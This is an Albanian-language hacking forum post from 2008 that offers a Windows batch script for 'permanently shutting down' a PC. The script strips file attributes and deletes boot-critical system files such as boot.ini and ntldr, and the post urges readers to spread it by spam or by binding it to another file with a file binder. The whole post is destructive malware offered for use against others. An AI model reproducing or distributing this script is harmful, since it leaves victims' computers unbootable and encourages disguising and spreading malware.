oLTi@NeT

Mirė Se Vini ne oLTi@NeT Froum
 
ForumPortaliRegjistrohuidentifikimi

Share
 

 fikja pc ..pergjithmon

Shko poshtė 
AutoriMesazh
plman
Anėtarė 0%
Anėtarė 0%


Male Numri i postimeve : 27
Age : 24
Vendii : vushtrri
Registration date : 08/09/2008

fikja pc ..pergjithmon Empty
MesazhTitulli: fikja pc ..pergjithmon   fikja pc ..pergjithmon I_icon_minitimeMon Sep 08, 2008 5:09 am

Hapim Notepadin dhe vendosim kėtė kodė:@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.iniE ruajmė kėtė fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat

Pėr ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.

Kujdes! Mos e hapni kėtė fajll ne PC tuaj.

Tash ju mbetet ta shperndani si tė dėshironi ju ,me spam apo edhe tia bashkangjitni njė fajlli tjetėr me ndonjė file binder
Mbrapsht nė krye Shko poshtė
 
fikja pc ..pergjithmon
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
oLTi@NeT  :: Hacking :: Programe per hack-
Kėrce tek: